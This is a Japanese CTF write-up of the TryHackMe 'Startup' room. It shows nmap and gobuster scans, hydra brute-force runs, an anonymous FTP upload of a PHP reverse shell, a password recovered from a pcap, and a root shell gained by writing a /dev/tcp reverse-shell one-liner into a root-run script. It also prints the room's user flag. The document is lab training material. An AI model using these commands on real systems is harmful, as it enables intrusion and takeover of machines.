[TryHackMe] Startup #Writeup

はじめに

備忘録です。

What is the secret spicy soup recipe?

nmapを実行する。

$ nmap 10.10.221.23

Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-17 01:13 BST
Nmap scan report for ip-10-10-221-23.eu-west-1.compute.internal (10.10.221.23)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:DC:F9:F1:BD:FF (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.80 seconds

以下の内容が書いてあった。
web developerを探しているらしい。

No spice here!

Please excuse us as we develop our site. We want to make it the most stylish and convienient way to buy peppers. Plus, we need a web developer. BTW if you're a web developer, contact us. Otherwise, don't you worry. We'll be online shortly!

-- Dev Team

gobusterを実行。
隠しディレクトリを探す。

gobuster dir -u http://10.10.221.23 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.221.23
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/07/17 01:21:36 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/files (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2024/07/17 01:21:38 Finished
===============================================================

/filesにアクセス。

index of /files
[ICO]	Name	Last modified	Size	Description
[PARENTDIR]	Parent Directory	 	- 	 
[DIR]	ftp/	2020-11-12 04:53 	- 	 
[IMG]	important.jpg	2020-11-12 04:02 	246K	 
[TXT]	notice.txt	2020-11-12 04:53 	208 	 
Apache/2.4.18 (Ubuntu) Server at 10.10.221.23 Port 80

notice.txt

Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.

important.jpgはAmong Usのミーム画像だった。
notice.txtからはMayaというメンバーの名前が判明した。
ftpが気になる。

$ ftp 10.10.221.23
Connected to 10.10.221.23.
220 (vsFTPd 3.0.3)
Name (10.10.221.23:root): Maya
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.

パスワードを空欄にしてみたが、はじかれた。
hydraでパスワード特定を試みる。

$ hydra -l Maya -P /usr/share/wordlists/rockyou.txt 10.10.221.23 ftp
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2024-07-17 01:37:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ftp://10.10.221.23:21/
[STATUS] 288.00 tries/min, 288 tries in 00:01h, 14344110 to do in 830:06h, 16 active
[STATUS] 293.33 tries/min, 880 tries in 00:03h, 14343518 to do in 814:59h, 16 active
[STATUS] 285.57 tries/min, 1999 tries in 00:07h, 14342399 to do in 837:04h, 16 active

ちょっと待ったけど見つかりそうにない。
common.txtで試してみる。

$ hydra -l Maya -P /usr/share/wordlists/dirb/common.txt 10.10.221.23 ftp
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2024-07-17 01:53:06
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4614 login tries (l:1/p:4614), ~289 tries per task
[DATA] attacking ftp://10.10.221.23:21/
[STATUS] 304.00 tries/min, 304 tries in 00:01h, 4310 to do in 00:15h, 16 active
[STATUS] 282.67 tries/min, 848 tries in 00:03h, 3766 to do in 00:14h, 16 active
[STATUS] 283.71 tries/min, 1986 tries in 00:07h, 2628 to do in 00:10h, 16 active
[STATUS] 281.92 tries/min, 3383 tries in 00:12h, 1231 to do in 00:05h, 16 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2024-07-17 02:09:40

かなしい😢
sshも挑戦。

$ hydra -l Maya -P /usr/share/wordlists/dirb/common.txt 10.10.221.23 ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2024-07-17 02:30:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4614 login tries (l:1/p:4614), ~289 tries per task
[DATA] attacking ssh://10.10.221.23:22/
[STATUS] 260.00 tries/min, 260 tries in 00:01h, 4357 to do in 00:17h, 16 active
[STATUS] 246.67 tries/min, 740 tries in 00:03h, 3877 to do in 00:16h, 16 active
[STATUS] 243.00 tries/min, 1701 tries in 00:07h, 2918 to do in 00:13h, 16 active
[STATUS] 241.75 tries/min, 2901 tries in 00:12h, 1718 to do in 00:08h, 16 active
[STATUS] 241.18 tries/min, 4100 tries in 00:17h, 519 to do in 00:03h, 16 active
[STATUS] 241.17 tries/min, 4341 tries in 00:18h, 278 to do in 00:02h, 16 active
[STATUS] 241.11 tries/min, 4581 tries in 00:19h, 38 to do in 00:01h, 16 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2024-07-17 02:49:42

惨敗です。
Anonymousでftpに接続してみる。

$ ftp 10.10.100.208
Connected to 10.10.100.208.
220 (vsFTPd 3.0.3)
Name (10.10.100.208:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
226 Directory send OK.

入れた。
見れるファイルはさっきブラウザで確認したものと同じっぽい。
ファイルをftpで送れるので、リバースシェルを狙う。
php-reverse-shell.phpをダウンロードしてくる。

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

php-reverse-shell.phpのIPとポートを書き換える。

nano php-reverse-shell.php

ファイルをftpで攻撃先に送る。

$ ftp 10.10.100.208
Connected to 10.10.100.208.
220 (vsFTPd 3.0.3)
Name (10.10.100.208:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
$ ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
200 PORT command successful. Consider using PASV.
553 Could not create file.

ここのディレクトリにはファイルをおけなかった。

$ ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
226 Directory send OK.
$ ftp> cd ftp
250 Directory successfully changed.
ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5494 bytes sent in 0.00 secs (149.6996 MB/s)

一階層したのftpというディレクトリに移動したらファイルを送れた。

あとは、リッスンして、webからphpファイルを起動させるだけ。

$ nc -nlvp 5555

phpにアクセスしたらShellをゲット！

$ nc -nlvp 5555
Listening on [0.0.0.0] (family 0, port 5555)
Connection from 10.10.100.208 33068 received!
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 00:51:54 up 18 min,  0 users,  load average: 0.00, 0.01, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

recipe.txtを見つけた。

$ cat recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.

粋やね

love

What are the contents of user.txt?

findでuser.txtを探す。

$ find / -name user.txt 2> /dev/null
$ 

見つからなかった。

暫く探索していると、incidentsディレクトリの下にsuspicious.pcapngというパケットキャプチャファイルが見つかる。

ftpを利用してローカルで解析するために、先ほどのftpまでコピーしてくる。

$ cp /incidents/suspicious.pcapng /var/www/html/files/ftp

ブラウザでftpフォルダを確認するとダウンロードできた。

whiresharkでsuspicious.pcapngを調査する。
192.168.22.139が192.168.22.139の4444番portと通信しているのが見れる。
TCPstreamを開いてみると、以下の内容だった。

Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:40:21 up 20 min,  1 user,  load average: 0.00, 0.03, 0.12
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
vagrant  pts/0    10.0.2.2         17:21    1:09   0.54s  0.54s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls
bin
boot
data
dev
etc
home
incidents
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
recipe.txt
root
run
sbin
snap
srv
sys
tmp
usr
vagrant
var
vmlinuz
vmlinuz.old
$ ls -la
total 96
drwxr-xr-x  26 root     root      4096 Oct  2 17:24 .
drwxr-xr-x  26 root     root      4096 Oct  2 17:24 ..
drwxr-xr-x   2 root     root      4096 Sep 25 08:12 bin
drwxr-xr-x   3 root     root      4096 Sep 25 08:12 boot
drwxr-xr-x   1 vagrant  vagrant    140 Oct  2 17:24 data
drwxr-xr-x  16 root     root      3620 Oct  2 17:20 dev
drwxr-xr-x  95 root     root      4096 Oct  2 17:24 etc
drwxr-xr-x   4 root     root      4096 Oct  2 17:26 home
drwxr-xr-x   2 www-data www-data  4096 Oct  2 17:24 incidents
lrwxrwxrwx   1 root     root        33 Sep 25 08:12 initrd.img -> boot/initrd.img-4.4.0-190-generic
lrwxrwxrwx   1 root     root        33 Sep 25 08:12 initrd.img.old -> boot/initrd.img-4.4.0-190-generic
drwxr-xr-x  22 root     root      4096 Sep 25 08:22 lib
drwxr-xr-x   2 root     root      4096 Sep 25 08:10 lib64
drwx------   2 root     root     16384 Sep 25 08:12 lost+found
drwxr-xr-x   2 root     root      4096 Sep 25 08:09 media
drwxr-xr-x   2 root     root      4096 Sep 25 08:09 mnt
drwxr-xr-x   2 root     root      4096 Sep 25 08:09 opt
dr-xr-xr-x 125 root     root         0 Oct  2 17:19 proc
-rw-r--r--   1 www-data www-data   136 Oct  2 17:24 recipe.txt
drwx------   3 root     root      4096 Oct  2 17:24 root
drwxr-xr-x  25 root     root       960 Oct  2 17:23 run
drwxr-xr-x   2 root     root      4096 Sep 25 08:22 sbin
drwxr-xr-x   2 root     root      4096 Oct  2 17:20 snap
drwxr-xr-x   3 root     root      4096 Oct  2 17:23 srv
dr-xr-xr-x  13 root     root         0 Oct  2 17:19 sys
drwxrwxrwt   7 root     root      4096 Oct  2 17:40 tmp
drwxr-xr-x  10 root     root      4096 Sep 25 08:09 usr
drwxr-xr-x   1 vagrant  vagrant    118 Oct  1 19:49 vagrant
drwxr-xr-x  14 root     root      4096 Oct  2 17:23 var
lrwxrwxrwx   1 root     root        30 Sep 25 08:12 vmlinuz -> boot/vmlinuz-4.4.0-190-generic
lrwxrwxrwx   1 root     root        30 Sep 25 08:12 vmlinuz.old -> boot/vmlinuz-4.4.0-190-generic
$ whoami
www-data
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@startup:/$ cd
cd
bash: cd: HOME not set
www-data@startup:/$ ls
ls
bin   etc	  initrd.img.old  media  recipe.txt  snap  usr	    vmlinuz.old
boot  home	  lib		  mnt	 root	     srv   vagrant
data  incidents   lib64		  opt	 run	     sys   var
dev   initrd.img  lost+found	  proc	 sbin	     tmp   vmlinuz
www-data@startup:/$ cd home
cd home
www-data@startup:/home$ cd lennie
cd lennie
bash: cd: lennie: Permission denied
www-data@startup:/home$ ls
ls
lennie
www-data@startup:/home$ cd lennie
cd lennie
bash: cd: lennie: Permission denied
www-data@startup:/home$ sudo -l
sudo -l
[sudo] password for www-data: c4ntg3t3n0ughsp1c3

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: c4ntg3t3n0ughsp1c3

sudo: 3 incorrect password attempts
www-data@startup:/home$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ftp:x:112:118:ftp daemon,,,:/srv/ftp:/bin/false
lennie:x:1002:1002::/home/lennie:
ftpsecure:x:1003:1003::/home/ftpsecure:
www-data@startup:/home$ exit
exit
exit
$ exit

パスワードを入力しているが、www-dataのパスワードではない。
ということは、lennieのパスワードかも？

$ ssh lennie@10.10.100.208
The authenticity of host '10.10.100.208 (10.10.100.208)' can't be established.
ECDSA key fingerprint is SHA256:xXyVGVy1l27TVcjIQj2kgTTmLYN6WCB93YJB3mAHLkA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.100.208' (ECDSA) to the list of known hosts.
lennie@10.10.100.208's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-190-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

44 packages can be updated.
30 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

$ ls
Documents  scripts  user.txt
$ cat *
cat: Documents: Is a directory
cat: scripts: Is a directory
THM{03ce3d619b80ccbfb3b7fc81e46c0e79}

ビンゴ！

THM{03ce3d619b80ccbfb3b7fc81e46c0e79}

What are the contents of root.txt?

sudo -lで権限昇格の糸口を掴む。

$ sudo -l
sudo: unable to resolve host startup
[sudo] password for lennie: 
Sorry, user lennie may not run sudo on startup.

残念。。。

Documentディレクトリの下には三つ以下のようなテキストファイルがあった。

concern.txt

I got banned from your library for moving the "C programming language" book into the horror section. Is there a way I can appeal? --Lennie

cat list.txt

Shoppinglist: Cyberpunk 2077 | Milk | Dog food

note.txt

Reminders: Talk to Inclinant about our lacking security, hire a web developer, delete incident logs.

scriptsディレクトリの下には以下の二つのファイルがあった。

planner.sh

#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

startup_list.txt

ls -l
total 8
-rwxr-xr-x 1 root root 77 Nov 12  2020 planner.sh
-rw-r--r-- 1 root root  1 Jul 18 01:53 startup_list.txt

本命はこっちっぽい。planner.shは実行権限がある。
planner.shは/etc/print.shを実行している。

/etc/print.sh

#!/bin/bash
echo "Done!"

$ ls -l
....
-rwx------ 1 lennie lennie    25 Nov 12  2020 print.sh
....

このprint.shにリバースシェルを仕込みたい。

調べると、使えそうなコマンドを見つけた。

$ echo 'bash -c "bash -i >& /dev/tcp/10.10.225.85/5555 0>&1"' > /etc/print.sh

あとはリッスンしてると、、、

nc -nlvp 5555
Listening on [0.0.0.0] (family 0, port 5555)
Connection from 10.10.100.208 33136 received!
bash: cannot set terminal process group (2010): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~# ls
ls
root.txt

root.txtをゲット！！